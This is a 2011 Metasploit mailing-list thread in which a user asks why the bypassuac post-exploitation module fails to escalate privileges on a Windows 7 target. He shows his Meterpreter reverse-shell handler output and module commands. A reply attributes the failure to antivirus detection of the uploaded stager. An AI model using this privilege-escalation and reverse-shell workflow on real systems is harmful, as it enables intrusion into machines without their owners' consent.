Re: BypassUAC not working against Windows 7 x86

[firstname lastname <psykosonik_frequenz () yahoo com>]

I guess, you missed out my note at the end of my post which says that there is not sort of AV running on the target 
machine.

I even captured the network traffic while the exploit was run and the bypassuac script was executed. There was no 
executable present in the PCAP file either. There were files only specific to the Browser Exploit.

Regards,
NeonFlash


________________________________
 From: Drforbin <drforbin6 () gmail com>
To: firstname lastname <psykosonik_frequenz () yahoo com> 
Cc: framework () spool metasploit com 
Sent: Sunday, December 4, 2011 10:21 AM
Subject: Re: [framework] BypassUAC not working against Windows 7 x86
 

I think what is happening is the AV is finding the meterpreter shellcode executable which bypassuac uploads to the 
system...I had this same issue and tracked it down to this.
Metasploit  executables even when encoded can be found pretty easy
    by some AV software.


drforbin.


I hope this helps...let me know.






On 12/03/2011 11:00 PM, firstname lastname wrote: 
I am trying to gain Local System Privileges on a Windows 7 x86 target system. I have a meterpreter reverse tcp shell on 
the victim's machine after a successful browser exploit on MSIE version 8.0 running on the target machine.
> sysinfo output:
>
> Computer        : Neon-PC
> OS              : Windows 7 (Build 7601, Service Pack 1).
> Architecture    : x86
> System Language : en_US
> Meterpreter     : x86/win32
>
> getuid output:
>
> Server username: Neon-PC\Neon
>
>
> Next I run the bypass uac script as follows:
>
>
> use post/windows/escalate/bypassuac
>
>
> Output:
>
>
> [*] Started reverse handler on 192.168.2.6:4444
> [*] Starting the payload handler...
> [*] Uploading the bypass UAC executable to the filesystem...
> [*] Meterpreter stager executable 73802 bytes long being
          uploaded..
> [*] Uploaded the agent to the filesystem....
>
>
>
> Next, when I type in getsystem, I still get the error as:
>
>
> priv_elevate_getsystem: Operation failed: Access is denied.
>
>
>
> I have gone through the ruby script, bypassuac.rb and looks like it's executing properly till the end. As a last step, 
> after uploading the UAC bypass agent to target machine, it has to execute it.
>
>
> But, looks like that is not happening. I even checked the %temp% directory on the target Windows Machine for the 
> presence of any exe and did not find one.
>
>
> Any help here would be appreciated.
>
>
> PS: I have disabled Windows 7 Firewall as well, just in case that would be blocking any transfer of file. Also, 
> there's no third party antivirus installed on the target machine.
>
>
> Regards,
> NeonFlash
>
>
>
>
>
>
>
> _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework